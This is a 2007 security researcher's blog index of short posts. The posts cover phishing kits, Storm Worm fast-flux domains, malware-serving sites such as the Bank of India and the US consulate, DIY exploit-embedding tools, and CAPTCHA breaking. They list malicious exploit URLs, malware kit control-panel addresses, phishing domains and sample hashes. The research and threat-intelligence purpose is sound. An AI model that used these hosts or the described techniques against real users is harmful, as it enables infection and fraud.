The Truth Serum - Have a Drink!

0
September 21, 2007
Which security vendor would you rather choose if you were to ignore your current Return on Security Investment model? The one telling you "everything's under control" , that "malicious attackers are loosing creativity and cannot bypass our security solutions", or the one who's attitude is "our solutions fully demonstrate marginal thinking in respect to fighting cyber threats, namely, they mitigate certain risks and limit the probability for a security incident, but do not and cannot provide 100% security"?

Basic human psychology and purchasing habits would stick to the first one, the one pretending to offer 100% security -- something even a condom cannot offer yet everyone's thankfully using them. Even worse, which is falling victim into the myopia that the market leader, or the company with the highest brand equity is actually the one worth doing business with. As it appears, McAfee CEO David DeWalt had a drink from the truth serum before InformationWeek's 500 Conference in order to comment that "We're in inning two of a nine-inning game here" in respect to how cyber threats often outpace security measures. Moreover, an year ago I commented on a Gartner analyst's statement that security is all about percentage of budget allocation, and therefore the more you spend the more secure you get, among the most common myopias nowadays. Now, Gartner vice-president John Pescatore is wisely insisting that companies spend less on IT security, and given how when Gartner sneezes the whole industry gets cold, it's a step in the right direction - debunking common security myopias.

In a world dominated by perimeter defense solutions, being a visionary realist is an objective luxury. Continue reading →

DIY Phishing Kit Goes 2.0

0
September 20, 2007
With the release of the second version of the DIY phishing kit that I covered in a previous post, next to commentary on another one and a DIY pharming tool, the timeframe for creating a phishing page just got shorter than it used to be before. Moreover, the phishing ecosystem is getting closer to fully achieving its malicious economies of scale, ones where the number of phishing campaigns in the wild outpaces the possibilities for timely shutting them down. Even worse, phishers do not seem to be interested in re-inventing the wheel, and having to create a new phishing page for any site or service, instead, such phishing pages are now a commodity, and with the ecosystem itself clearly cooperating with malware authors, you end up in a situation where a malware infected host is not just hosting malware for the next victim to get infected, running multiple DNS servers, sending out spam and phishing emails, but also, hosting the phishing pages themselves.

Amateur phishers do not put efforts into ensuring the quality and the lifetime of their phishing campaigns, and you can clearly recognize such amateur campaign by visiting the phishing URL you've just received to figure out it's already down. The more sophisticated phishers, however, are not just efficiency-obsessed, but also, take advantage of typosquatting and basic segmentation approaches, for instance, acquiring a Russian email database to use as the foundation for a WebMoney phishing campaign, and a U.S one for a PayPal one. Moreover, sophisticated phishers also put more efforts and invest more time into personalizing the emails and in rare cases, the phishing pages themsleves, that's of course in between localizing the campaign by having it translated into the local language of the country for which the emails database belongs to, thus improving the chances of the campaign. This is yet another disturbing trend worth commenting on - malware is maturing into a services centered economy, and so is the case with spamming and phishing, a logical development with the commodization of what used to very exclusive tools.

What are the major improvements in the new version? In the first one, the phisher had to manually paste the source code of the real page, have the kit automatically redirect the data to a third party URL, and also manually fix the image locations to ensure that they will load properly. In the second version, there're POST and GET commands available so that the source code gets acquired automatically, and an internal Image Grabber so that the exact URLs of all the images within the login page can get easily integrated within the phishing page about to get generated. Getting back to differentiating the amateur from sophisticated phishers, the second have more resources at their disposal and better confidence in their hosting provider so that compared to loading the images from the original site, they're hosting them locally. This kit will inevitably continue to evolve, wish it was proportionally with the end user's understanding of how to protect against "push" phishing attacks though.

Related posts:
Taking Down Phishing Sites - A Business Model?
Continue reading →

Custom DDoS Capabilities Within a Malware

0
September 19, 2007
DDoS capabilities within a malware are nothing new and are in fact becoming a commodity feature, but compared to the average DDoS-ers with up to two different DoS attack approaches, or the types of malware with hardcoded IPs to be attacked, there's a disturbing trend to diversify the DoS techniques used as much as possible to improve the chances of a successful attack, let's not mention the allocation of automatic self-defensive DDoS back at curious parties due to the oversupply of infected hosts. As you can see in this particular malware -- high detection rate -- the DDoS variables within are not only diverse enough to cause a lot of damage, but also, simultaneous combinations are also possible.

Now comes the digitally ugly part. Open source malware results in many different variants with a huge variety of new modules and options implemented within, even worse, the software client can indeed mature into a web based malware C&C like the ones we've been seeing since the beginning of 2007. And this is exactly what happened with this open source malware - a Chinese hacking team is currently offering a Web builder for sale, making it possible to integrate the malware on the Web in a typical do-it-yourself fashion. What types of attacks are included anyway :

- ICMP/SYN/TCP and UDP flooding
- HTTP no-cache, GET flooding
- CC variety
- GAME, CIDR, Hybrid flooding capabilities

The Black Sun bot, the Cyber bot, MPack, IcePack, WebAttacker, the Nuclear Malware Kit and Zunker, are all Web based malware platforms and were originally released as such compared to the Web adaption of this one.
Continue reading →

Two Cyber Jihadist Blogs Now Offline

0
September 19, 2007
Jihad Fields are Calling and The Ignored Puzzle of Knowledge are down, apparently the authors themselves decided to delete them compared to Wordpress shutting down the Global Islamic Media Front like it happened before. Ensuring that these "tip of the iceberg" cyber jihadist communities stay offline has a long-term PSYOPS effect on future wannabe cyber jihadists wanting to operate such communities, ones where talkers eventually turn into doers. Continue reading →

A Chinese Malware Downloader in the Wild

0
September 17, 2007
This is an example of a recently released in the wild DIY downloader with rather average features such as the ability for the malware author to choose multiple locations of the files to be "dropped", as well as the time interval to check for the newly distributed binaries. The high detection rate of the downloader itself -- Result: 23/32 (71.88%) -- is not the main point I'd like to emphasize on, but rather that compared to the majority of downloaders courtesy of Russian malware authors I come across to occasionally, this is a Chinese one. China is often blamed to be the country hosting the highest percentage of malware in the world, however, China is also the country with highest percentage of infected PCs, and as we've seen with Storm Worm an infected host starts acting as both infection and propagation vector for the malware in question. As in any other local malware market, DIY tools get released so that script kiddies can generate enough noise to keep the more sophisticated malware campaigns running behind the curtains. Continue reading →

PayPal and Ebay Phishing Domains

0
September 17, 2007
As I needed another benchmark for a creative typosquatting next to my best finding of this World of Warcraft domain scam, I stumbled upon the following list of domains, where the most creative domain squatting is done solely for the purpose of including the domains within a typical phishing scam URL structure. Some of the domains are actual Rock Phish ones that are currently hosting live phishing campaigns :

paypal-online-account.com
paypal-user-update.com
paypal-support1.com
paypal-account-protection.com
paypal1-login.com
paypal-accounts-update.com

Some "creative" ones to be abused :

paypal-aspx.com
paypal-cgi3.info
paypal-cmd.com
paypal-comlwebscrc-login-run.com
paypal-confirmation-id-0746795.com

And since PayPal is actually EBay after the acqusition, here're some "creative" Ebay domain scams as well :

ebay-com-isapidll.com
ebayisapidll-cgi.com
ebayisapidllaw2.com
ebayisapidllu.com

Authentication itself seems to be a priority as the customer must possess a tangible proof that her transactions' security is somehow enhanced by a layered authentication, no doubt about it. But with phishers actively using a "push" model that is starting to visually social engineer the customers by registering domains imitating PayPal and EBay's web application structure, authentication itself shouldn't be a priority number one the way it is for the time being as phishers are not even trying to bypass it.

Stats courtesy of the Anti-Phishing Working Group. Continue reading →

Storm Worm's DDoS Attitude - Part Two

0
September 17, 2007
After commenting on Storm Worm's logical connection with the recent DDoS attacks against anti-scam web sites, SecureWorks timely released details of what actions could trigger a DDoS attack from Storm back at the researcher's host and what type of DDoS attacks are launched exactly :

"The attacks do show signs of being automated. Certain actions reliably trigger attacks. Investigators who can withstand the onslaught and have decided to test their theories (with cooperation from their ISPs, of course) can reliably trigger DDoS attacks on themselves. In one case, probing more than four unique Peacomm botnet HTTP proxies within ten seconds results in a flood of TCP SYN and ICMP packets, which last for about two hours. That’s all fairly regular."

To me, this tactic is more of a "hey our situational awareness on your actions to shut us down is fairly food enough" type of statement, but why would the botnet masters risk exposing infected hosts compared to the opportunity to have them act like nothing's in fact wrong with them? Mainly because if infected hosts were a scarce resource perhaps they would, but in Storm Worm's case the oversupply of infected hosts is allowing them to dedicate resources for automatic self-defensive DDoS. Continue reading →

U.S Consulate St. Petersburg Serving Malware

0
September 14, 2007
If that's not a pattern and good timing, it's a malicious anomaly. On the 31 of August, 2007, Bank of India was serving malware courtesy of the Russian Business Network. This week, evidence that the U.S Consulate in St. Petersburg, Russia was serving malware to its visitors proved to be true. The web site is now clean, but assessing the IFRAME-ed URLs used in the attack is possible as they're still reachable. It's still unknown for long the IFRAMEs remain embedded at the Consulate's web site, as well as when were they cleaned, but the attack was still active on the 2nd of September, 2007, just two days after Bank of India's malware attack. It's also worth mentioning that compared to the most recent malware embedded attacks which had the IFRAMEs directly embedded within, in this one the IFRAME itself is obfuscated but the live exploit URL isn't.

Tipped by a third-party, Sophos managed to locate the exact URL by deobfuscating the rather simple URL obfuscation, and Fraser Howard posted some interesting details at their blog :

"The purpose of the attacks is to infect victims with Trojans from the two attack sites. As discussed in a recent paper, the increased use of automation to continually re-encrypt/pack/obfuscate the Trojans highlights the need for good generic detection technology. A system to continuously monitor these files in order to maintain detection is essential. So, to answer the question of whether the U.S. Consulate General site was specifically targeted in this attack - my answer is no, probably not. The prevalence of other much smaller sites compromised in exactly the same way (in just seven days worth of data) suggests that the hackers just happened to have caught a big fish as they trawled for vulnerable servers. It just goes to show that security is important on all machines hosting both small and large websites."

We could greatly expand those as a matter of fact. The IFRAME used leads us to verymonkey.com/goof/index.php (209.123.181.185) and verymonkey.com/test/index.php which is exploiting a modified MDAC, and aims to execute the following binary Virus.Win32.Zapchast.DA :

Detection rate : Result: 6/32 (18.75%)
AntiVir 2007.09.14 DR/Delphi.Gen
AVG 2007.09.14 Obfustat.NPJ
eSafe 2007.09.13 Suspicious Trojan/Worm
Ikarus 2007.09.14 Virus.Win32.Zapchast.DA
VirusBuster 2007.09.13 Trojan.Agent.JVF
Webwasher-Gateway 2007.09.14 Trojan.Delphi.Gen

File size: 28672 bytes
MD5: a25ad0045d195016690b299bfb8b75d1
SHA1: ab219c50b0adc84f702c696797e81411b6eab596

Is this obfuscated IFRAME-ing a fad or a trend? I think it's a trend since IFRAME-ing to a secondary domain taking advantage of popular web malware exploitation techniques is already rated as suspicious by security vendors, and Google themselves warning you that "this site may harm your computer", and so they ought to win time. Moreover, such obfuscations are making it harder to assess how many sites and which ones exactly were victims of the attack in an OSINT manner. It gets even more interesting, the IP hosting verymonkey.com was historically used to host banksoffscotland.co.uk scam web site in March this year. In case you wonder, it's not the RBN that's behind this malware embedded attack, but let's say it's a subsidiary of the RBN.
Continue reading →

209 Host Locked

0
September 12, 2007
Ever came across this fake error message? A "209 Host Locked" message on a fraudulent domain is the default indication that you're on a Rock Phish domain, that is a single domain hosting multiple phishing campaigns aimed at different financial institutions. And as more Royal Bank of Scotland phishing emails are cirtulating in the wild, these very same emails pointed me to a Chinese Rock Phish campaign which was shut down as of yesterday. What is different in this campaign, compared to the previous one? The phishers put more efforts into ensuring the phishing email gets through spam filters by using spacing, adding _ in front of random words, as well as the usual garbage content at the end of the email. All the URLs within the campaign are already in the Phishtank, DSLreports.com's wisdom of the anti-phishers crowd continues exposing Rock Phish domains on a daily basis, an effort worth keeping track of.

The Rock Phish Kit is the logical evolution from DIY phishing kits like the one I've already blogged about, however, both concepts are not mutually exclusive but apparently tend to work together. The DIY phishing kits on their part are largely used in the planning stage of the phishing campaign, that is, fake sites get generated and the data obtained forwarded to a single place, which is where Rock Phish starts getting used, namely, in the execution stage, where all the phishing pages generated get hosted on a single domain. Phishing efficiency vs Rock Phish's weakness due to centralization of numerous campaigns on a single domain - it's the phishers' trade-off. Within the phishing ecosystem, there's are numerous approaches phishers tend to use to achieve maximum efficiency, ones I've already discussed in a previous post. The most prolific problem to me remains phishing 1.0's "push" model that is still remarkably successful compared to the more advanced man in the middle phishing attacks and pharming. From my perspective, if a financial institution really wants to protect its customers from phishing scams, it would first segment the threat, evaluate its customer's perception of it and current level of awareness, and then start an educational campaign aiming to not teach them how to recognize whether a site is a phish or not, but how to report and ignore the "push" models emails that arrive in their mailboxes. From another rather pragmatic perspective, phishers don't just load images for their phish emails from the company's website, but also the majority of phishing emails redirect to the real web site after the data was submitted - an early warning system by itself. Continue reading →

Storm Worm's DDoS Attitude

0
September 11, 2007
Stage one - infect as many end users with high speed Internet access as possible through the use of client side vulnerabilities. Stage two - ensure the longest possible lifecycle for the malware campaign by having the newly released binaries hosted at the infected PCs themselves. Stage three - take advantage of fast-flux networks to make it harder to shut down the entire botnet. And stage four - strike back at any security researcher or vendor playing around with Storm Worm's fast-flux network or somehow messing up with the malicious economies of scale on a worldwide basis. On Friday I received an email from Susan Williams at aa419.org, and as it looks like several other anti-fraud sites are getting DDoS-ed too :

"On September 2 2007, online scammers began an automated DDoS attack against aa419.org, with the goal of shutting down the anti-fraud site. For some time, aa419 was able to filter the worldwide botnet's attacks by monitoring connections and only allowing legitimate visitors to access thesite. However, by September 5 the hoster was being overwhelmed with nearly 400 GB of incoming requests every hour. Rather than let their infrastructure melt under the onslaught, the server is currently offline. This massive distributed denial of service (DDoS) attack was inspired by aa419.org's mission to blacklist and shut down scam web sites. Since 2004, the all-volunteer organization has recorded more than 18,000 such sites. In addition to publicly warning potential victims of fraud, they work with hosters and registrars to take scam web sites offline quickly, with a success rate of over 97% shut down. Susan Williams, press officer for aa419.org, said, "On the whole, we're positive about this. Not that we enjoy being offline; quite the opposite. But being attacked with a botnet of this magnitude tells us that we are doing serious damage to the organized crime networks that run these scams." Internet crime is increasing at record rates, and aa419.org is at the forefront of the fight against it. "We will continue our work regardless of how many criminals are annoyed by it," Williams said."

Castlecops comments on the DDoS taking place at the site too :

"This newest ddos round started about a week ago and knocked us offline for a couple hours while we figured out what was going on. And we're still under attack, so if the site is a bit slower, you know why. Odd month really, lots of sites, lots of sites, are under ddos. We've got over 10k bots attacking us with more being added daily."

As a friend recently pointed out - you ain't making a difference until you start getting DDoS-ed.

Cartoon courtesy of Joyoftech.com, here're more courtesy of myself.

Related posts:
The War against botnets and DDoS attacks
Emerging DDoS Attack Trends
DDoS On Demand vs DDoS Extortion Continue reading →

Google Hacking for MPacks, Zunkers and WebAttackers

0
September 10, 2007
If wannabe botnet masters really wanted to hide their activities online, they would have blocked Google's crawlers from indexing their default malware kit installations, and changed the default installation settings to random directory and filename, wouldn't they? Apparently, a default deny:all rule for anyone but the botnet masters doesn't exist as a principle among botnet amateurs, which leaves us with lots of malware campaigns to assess and shut down.

The following are IPs and domain names currently or historically used to host MPack, WebAttacker and Zunker control panels, as well as live exploit URLs within the packs. Some are down, others are still accessible, the rest are publicly cached. If index.php doesn't exist, admin.php or zu.php act as the default admin panel.

MPack Malware Campaigns :

wmigra.org/mpack/index.php
64.62.137.149/~edit/
81.95.145.240/logo/
81.95.150.42/MPack091cbt/index.php
brbody.info/mpack/index.php
innaidina.info/mpack/index.php
rallyesimages.ch/liens/test/
sol.h18.ru/mpack/index.php
81.95.145.240/logo/
icqmir.iplot.ru/mpack/index.php
cordon.ru/mp/
havephun.org/mpack/index.php
xbr.ru/images/old/mpack/index.php
evil-x.org/spk2/
tyt-menia.net/mpack/index.php
rufat.info/mpack/index.php
iwiw-hosting.com/upload/
stepbystepbg.org/img/
mydulichusa.com/mpack/index.php
csextra.wz.cz/weapons/mpack/index.php
d34thnation.com/mpack/index.php
mp3fans.org/mpack084/
innaidina.info/mpack/

WebAttacker's Hosts :

secondsite2.com/cgi-bin/ie0604.cgi
lsdman.info/cgi-bin/ie0604.cgi?bug=MS05-001&SP1
telecarrier.es/cgi-bin/ie0604.cgi
stmare.info/cgi-bin/ie0604.cgi
redcrossonline.cn/cgi-bin/ie0604.cgi

Zunker's C&C :

66.148.74.7/zu/
bundeswehrzentrale.org
skilltests.org/zu/zc.php
zup.secondsite1.com/zu/index.php
stat1.realstatscollect.com/zu/
webcounterstat.info/zu/

I also find it very interesting to see VeriSign publicly admitting of hacking into the hosts behind the malware kits -- the Russian Business Network in this case -- to assess the damages done in the form of number of infected PCs and with what exactly :

"When VeriSign managed to hack into the RBN computer running the scam, it found accumulated data representing 30,000 such infections. “Every major trojan in the last year links to RBN” says a VeriSign sleuth."

Unethical penetration testing of malicious hosts to assess the damages by the malware campaign in question wouldn't result in the malware authors striking back with legal complaints, instead, they'll forward some DDoS bandwidth back at the investigating IPs, a consequence I'm sure researchers reading here have experienced before. On the other hand, the RBN themselves are getting more malicious with every new campaign, just consider for instance that Russian Business Network's IPs were behind the Massive Embedded Web Attack in Italy that took place in June, 2007, and the most recent Bank of India breach as well. Continue reading →

Popular Web Malware Exploitation Techniques

0
September 10, 2007
Who needs zero day vulnerabilities to achieve a widescale malware infection these days? Obviously the lack of this popular in the past prerequisite for a successful client side vulnerability exploitation, is no longer needed, but how come? Rather simple and that's the disturbing part - malicious parties stopped falling victims into the common perception that the end user is so fully patched, that zero day vulnerabilities are needed to break thought his thought to be complex use of security measures, instead, whether an event-study or plain simple common sense on their part, they've realized that an unpatched and obfuscated vulnerability is just as dangerous as a zero day, and the results have been evident ever since.

Going through the screenshots of the infected population of a certain malware kit, you can clearly see the diversity of the outdated vulnerabilities used. Multi-browser vulnerabilities IFRAME-ed all-in-one to achive the highest possible efficiency rate as there's a slight chance a visitor will return to a site they've managed to embedd the malware at, twice. The success of the these kits therefore has nothing to do with malicious innovations, but rather a successful tactical warfare against reactive security response. If perimeter defense cannot be breached, it will get either ignored or bypassed, precisely why client side vulnerabilities are back in the game with full speed.

Evidence showcasing this KISS (Keep it Simple Stupid) principle :

- IcePack, MPack, WebAttacker, the Nuclear Malware Kit, and pretty much every popular malware kit is taking advantage of outdated vulnerabilities, whether obfuscated or not depends on the pack's version and the malicious party's understanding of the concept

- The Massive Embedded Web Attack in Italy was using MPack's outdated arsenal of obfuscated vulnerabilities and despite that it achieved its objectives and infected thousands of hosts

- The recent Bank of India breach was using a modified version of the popular malware kits mentioned above, in between syndicating the hack with another campaign using a multi-IFRAME-ing techniques, again taking advantage of outdated vulnerabilities

- Storm Worm's success is mostly due to the fact that the end user is still living in the "malicious attachment" world, and so outdated vulnerabilities are again successfully used again her

Exploit Prevention Labs's recent stats on common vulnerabilities used as an infection vector can come very handy in terms of demonstrating the mass use of these malware kits. The bottom line is that their modularity combined with features and add-ons for them available either though a purchase or on demand, is an emerging trend by itself, one whether you cannot tell is it a script kiddie or sophisticated malicious party you're dealing with. And even if it's the second, the KISS principle has its own ugly applicability in the malware world. Continue reading →

Infecting Terrorist Suspects with Malware

0
September 06, 2007
As we've already seen in the past, cyber jihadists, thus wannabe terrorists, use commercial anti virus, anti spyware and anonymity software. Therefore, if law enforcement starts benchmarking its creations against the most popular anti virus software, and purchasing private malware crypters to obfuscate the binaries, who would security vendors be protecting you from - law enforcement, or Yuri and Andrei, the fictional characters of two botnet masters? The practice is nothing new when it comes to intelligence gathering and the concept of OSINT through malware for instance. What's new is its applicability to law enforcement, which in a combination with bureaucracy could mean a law in a typical Chinese anti-censorship enforcement, that would oblige security vendors in the coutry to ignore the malware if they want to continue doing business there. Could we perhaps also witness a collective bargaining effort from security vendors not to do this, given the interest of using malware against potential suspects, a largely open topic by itself? Germany floats Trojan for terror suspects :

"Would-be terrorists need only use Ubuntu Linux to avoid the ploy. And even if they stuck with Windows their anti-virus software might detect the malware. Anti-virus firms that accede to law enforcement demands to turn a blind eye to state-sanctioned malware risk undermining trust in their software, as similar experience in the US has shown. Once the malware gets into circulation there's no guarantee it won't be turned against innocent users. The whole concept is loaded with irony. For one thing, German government computers, like those in the UK before them, are currently under targeted Trojan assault."

Targeted mailings to potential terrorists wouldn't work as effective as embedding IFRAMES within the cyber jihadist communities, and in the future, we may also see anti-terrorist malware kits courtesy of an unknown government that's purchasing or bidding for zero day browser vulnerabilities or anti virus software ones, in order to infect potential terrorists by bypassing their security solutions in place. Continue reading →

Examples of Search Engine Spam

0
September 05, 2007
Perhaps I should say an example of a 50/50 black hat SEO, as Google's not listing the first, but has already crawled the second -cashhomes.info/content ; mydream-condos.info/content. While assesing the first link farm I found out that on average, 263 pages have exactly 6411 outside links in them, 24.3 links per page. Pretty much the same case with the second one. Owning hundreds of domains like these and feeding them with garbage content in between syndicating ads can undermine a search engine's credibility if the black hat SEO operation starts appearing at the top results, and as we've already seen, both black hat SEO and paid keywords advertising can lead to malware embedded sites. Continue reading →

Storm Worm's Fast Flux Networks

0
September 05, 2007
Following my previous posts on "Storm Worm Malware Back in the Game" and "Storm Worm's use of Dropped Domains", here are some handy graphs of Storm Worm's use of fast-flux networks generated during the last several hours, acting as great examples of how diverse malware C&C has become.

- bnably.com

Domain servers in listed order:
ns13.bnably.com
ns12.bnably.com
ns11.bnably.com
ns10.bnably.com
ns9.bnably.com
ns8.bnably.com
ns7.bnably.com
ns6.bnably.com
ns5.bnably.com
ns4.bnably.com
ns3.bnably.com
ns2.bnably.com


- wxtaste.com

Domain servers in listed order:
ns13.wxtaste.com
ns12.wxtaste.com
ns11.wxtaste.com
ns10.wxtaste.com
ns9.wxtaste.com
ns8.wxtaste.com
ns7.wxtaste.com
ns6.wxtaste.com
ns5.wxtaste.com
ns4.wxtaste.com
ns3.wxtaste.com
ns2.wxtaste.com


- snbane.com

Domain servers in listed order:
ns13.snbane.com
ns12.snbane.com
ns11.snbane.com
ns10.snbane.com
ns9.snbane.com
ns8.snbane.com
ns7.snbane.com
ns6.snbane.com
ns5.snbane.com
ns4.snbane.com
ns3.snbane.com
ns2.snbane.com

- tibeam.com
Domain servers in listed order:
ns13.tibeam.com
ns12.tibeam.com
ns11.tibeam.com
ns10.tibeam.com
ns9.tibeam.com
ns8.tibeam.com
ns7.tibeam.com
ns6.tibeam.com
ns5.tibeam.com
ns4.tibeam.com
ns3.tibeam.com
ns2.tibeam.com


- eqcorn.com

Domain servers in listed order:
ns10.eqcorn.com
ns11.eqcorn.com
ns12.eqcorn.com
ns13.eqcorn.com
ns2.eqcorn.com
ns3.eqcorn.com
ns4.eqcorn.com
ns5.eqcorn.com
ns6.eqcorn.com
ns7.eqcorn.com
ns8.eqcorn.com
ns9.eqcorn.com

The Honeynet Project & Research Alliance defines a fast-flux network as :

"Fast-flux service networks are a network of compromised computer systems with public DNS records that are constantly changing, in some cases every few minutes. These constantly changing architectures make it much more difficult to track down criminal activities and shut down their operations."

In Storm Worm's case, we have an example of fast-fluxing dropped domains, and if you research a little further, you'll see that newly infected Storm Worm hosts shown in this particular moment of the fast-flux are already sending out spam.
Continue reading →

Login Details for Foreign Embassies in the Wild

0
September 04, 2007
Login details for international embassies have been in the wild since August 30th in a full disclosure style :

"Here is a list with working passwords to exactly 100 email-accounts to Embassies and Governments around the world. Yes it’s the real deal and still working when we are posting this. So why in the world would anyone publish this kind of information? Because seriously, I’m not going to call the president of Iran and tell him that I got access to all their embassies. I’m DEranged, not suicidal! He has bombs and stuff…"

The researcher's main motivation behind releasing these is that there's no point in contacting the email owners directly as no one would take his emails seriously enought and change them, so by going full disclosure it would prompt the embassies in question to change the passwords. Dan Egerstad may be quite right, at least on the passwords changing issue. Could these email accounts be accessed globally and if yes why? For instance, could Uzbekistan's embassy in London successfully login into Uzbekistan's embassy in Moscow, and even worse, could a host not belonging to the embassy's network access these mailboxes for flexibility? If yes, there're way too many ways this data could have been obtained. While going through the accounting data, we could both confirm that best practices for strong passwords are place at some embassies, and also question the lack of such best practices at certain ones, a security measure that works against brute forcing attempts, but is totally irrelevant when it comes to keylogging and sniffing.

Many people would logically consider the possibility of abusing these login details by obtaining the content of the mailboxes. However, another perspective worth keeping in mind is the use of this login data as the foundation for targeted attacks on a embassy-to-embassy basis, the way we've seen it happen before.
Continue reading →

DIY Exploits Embedding Tools - a Retrospective

0
September 04, 2007
Great analysis by the Spywareguide folks -- Chris Boyd and Peter Jayaraj in this assessment -- especially my deja vu moment with the King's IE Exploiter tool which I intented to cover in an upcoming post, in a combination with a brief retrospective of exploit and malware embedding tools that were empowering entire generations of script kiddies during the last couple of years. These tools are a great example of what the DIY trend used to look like before malicious economies of scale were embraced in the form of today's modular and efficiency-centered malware kits we're aware of.

-- The IE Exploiter v1.0/2.0

The tool is first know to have emerged back in 2002, with its latest version released in 2004. It was first branded as the "Fearless IE Exploiter" and then returned back to it's original name. Description of the v1.0 : "Fearless IE Exploiter allows you to embed executable files into HTML documents, that when viewed in an unpatched version of Internet Explorer 5.* will automatically download and execute the .exe". And the description of v2.0 : "IE Exploiter v2 is a very simple tool that creates a HTML file with an embedded executable file. Once the HTML file is viewed the executable file will overwrite notepad.exe on the target system and then execute it using the view-source: prefix."

Result: 22/32 (68.75%)
File size: 149359 bytes
MD5: 315cd35aa5a0334697832e83fac7b0dc
SHA1: 71a7929f7781d969a63e532cd8cd877940a2ca12

-- King's IE Exploiter

King's IE Exploiter is an Arabic DIY exploit embedding tool released around 2004. Despite that the malware embedded sites generated on-the-fly come totally unobfuscated, we will yet wait and see the eventual release of such feature.

Result: 6/32 (18.75%)
File size: 253440 bytes
MD5: e6052d3abf95429fd761feef0a695470
SHA1: 9f91e21bf9e8898a09c36b31bb1f5afff3cb8f35

-- Zephyrus

Again relased around 2004, the description reads : "Its a prove of concept tool to generate a Stench MediaPlayer Exploit file more infos about stench can be found here http://malware.com or at here AVP calls it exploit.win32.zephyrus"

Result: 30/32 (93.75%)

-- God's Will

The description reads : "A GODMESSAGE page is an HTML page that works with an ACTIVEX bug founded in IE5.5/OUTLOOK/OUTLOOK EXPRESS. Thanks to this bug when someone view our godmessaged page he downloads an HTA file in his STARTUP FOLDER.'

Result: 32/32 (100%)

-- Ed Html Infector

The description of the tool circa 2004 reads : "Ed HTML Infector is a very simple tool that creates HTML file with an embedded executable file within."

Result: 14/32 (43.75%)
File size: 118784 bytes
MD5: 94c642903318f89d410c64d46f2047aa
SHA1: b834cd34283e541dccb5aad81fb49ca97adbb48c
Continue reading →

Spammers and Phishers Breaking CAPTCHAs

0
September 03, 2007
The emergence of CAPTCHA based authentication was a logical move in the fight against automated brute forcing of login details, registrations, spamming and sploging in the form of comments and splogs registration. And consequently, spammers, phishers and malware authors started figuring out how to automatically achieve their objectives, by either breaking or adapting to a certain CAPTCHA, and even more pragmatic - outsourcing the request to a third-party.

Two months ago, there were news stories on how spammers and phishers feeling the pressure put on them by anti spam vendors, have supposedly broken Hotmail and Yahoo's CAPTCHA. Nothing is impossible, the impossible just takes a little longer, what's important is discussing the many other perspectives related to adapting to a CAPTCHA, directly breaking it, or entirely ignoring it.


In the first example you can see an automatic CAPTCHA recognition at a Russian email provider. What the script is doing is basically syndicating proxies, ensuring they work, and starting the mass registration process while providing confirmation or error results in between. The CAPTCHA in question is indeed primitive, but the email provider's clear IP reputation and launch pads for spam, phishing and malware is what the malicious parties are really interested in. Once the CAPTCHA becomes easily recognizable, the entire process of logging in and sending the malicious content can also be fully automated.

In the second example you can see a great example of the adaptation process. The CAPTCHA cannot be efficiently abused we we've seen with the first case, but instead of putting efforts into breaking it directly, the malicious parties are simply adapting. Once proxies get syndicated and verified for connectivity, a request for the number of accounts to be registered is initiated, the script then responds with automatically generated logins, and presents the CAPTCHA to be manually entered by the malicious party. Malicious economies of scale in action, despite that the CAPTCHA cannot be broken, the process is still partly automated, another example of marginal thinking applied in order to achive an objective.

Sample CAPTCHA breaking project requests :

- "I need a captcha breaker that can break captchas that are of the same style i will upload here.I will want a c++ dll that recieves a file path and returns a char* with the content of the picture (letters and numbers)"

- "The program needs to take a myspace captcha image and determine what the text says in the image. The accuracy needs to be 80%+"

- "We are an expert group for inputing captcha for you with very low price and high accuracy. We can input 10k to 100k (depending on how many you can offer to us) per day with accuracy at least 70% (for simple captcha such as yahoo, it is above 95%). We also own expert programmers who can help you with writting your spiders or other softwares to get and manage all the captchas."

Some are purely malicious, others aim to verify the security of a CAPTCHA in development for instance. Let's summarize - Why are malicious parties interested in defeating CAPTCHA's at popular sites?

- take advantage of the clear IP reputation of the email service in order to improve the chance of having their phishing/spam/malware email successfully received

- set the foundations for a large scale automated spamming/phishing operations by using legitimate email addresses, thus improving their chances of not getting filtered

- automated registration of splogs -- spam blogs

- as search engines are starting to crawl sites submitted at the most popular social networks in real time, spammers or malware authors are naturally interested in abusing this development to timely attract huge
audiences at their splogs who often have malware embedded within

What are malicious parties doing to achieve efficiency despite their inability to defeat an advanced CAPTCHA?

- humans entering the CAPTCHAs while the script is auto generating, storing and auto logging with the passwords in a combinated with the human entered CAPTCHA

- adapting compared to putting more efforts into rocket science as whenever a CAPTCHA cannot be beated automatically, as you already saw on the second screenshot, they're making it easier for humans to enter the CAPTCHA and faster compared to an end user browsing

- outsourcing making it sound it's more of a quality assurance project of CAPTCHA to be introduced on the market

What can web sites do to prevent that sort of malicious behaviour? Strong CAPTCHAs should be in place by default, but taking another perspective, the way I discussed how click fraud could be easily detected by advertising networks syndicating IPs of already known to be malware infected hosts, in this very same fashion we could have CAPTCHA system that would check to see if, for instance, default proxy ports are opened at the host trying to register, and whether or not they're part of a botnet. With data like this now a commodity, a prioritization process to closely monitor mass registrations from these IPs is a pragmatic early warning system.
Interesting reading on the big picture too - CAPTCHA - The Broken Token :

"How much does it cost to have a CAPTCHA hack custom developed? $10 to $20 ought to do the trick; certainly no more than $50. But the cost isn’t the point. What’s more alarming is that thousands upon thousands of site owners are depending upon flawed technology to protect their sites from spam even though they know, or at least should know, that it’s only a matter of time until some spam robot shows up and starts hammering away at those worthless little images."

The irony regarding CAPTCHAs are how less popular sites compared to the Web 2.0 darlings often have a more sophisticted CAPTCHA compared to the most widely used web sites.

Related links:
Continue reading →

Bank of India Serving Malware

0
August 31, 2007
Ryan at ZDNet's Security blog is reporting on the breached site of Bank of India, which in the time of blogging is still serving malware to its current and potential customers through the infamous Russian Business Network - 81.95.144.0 / 81.95.147.255.

At the bank's URL there's a link pointing out to goodtraff.biz (58.65.239.66) where an IFRAME loads to 81.95.144.148/in.cgi?10 whereas while accessing it we get response from 81.95.144.146, where we get the usual javascript obfuscation leading us to 81.95.144.146/at/index.php and 81.95.144.146/rut/index.php. Furthermore, the second IFRAME leads us to x-traffic.biz/ts/in.cgi?user0224 (which is a Russian Adult Traffic network) redirecting us to mymoonsite.net/check/version.php?t=167 (81.95.148.13) and a third one loading goodtraff.biz/tds/index.php (empty). What does it mean? It means the Russian Business Network has not just managed to inject its presence on Bank of India's site, but is also using multiple-iframing as an attack vector, thus creating a fast-flux network with multiple campaigns within I'll assess in this post.

Apparently, Trend Micro's been busy uncovering the n404 exploit kit, which is also used in this campaign aimed
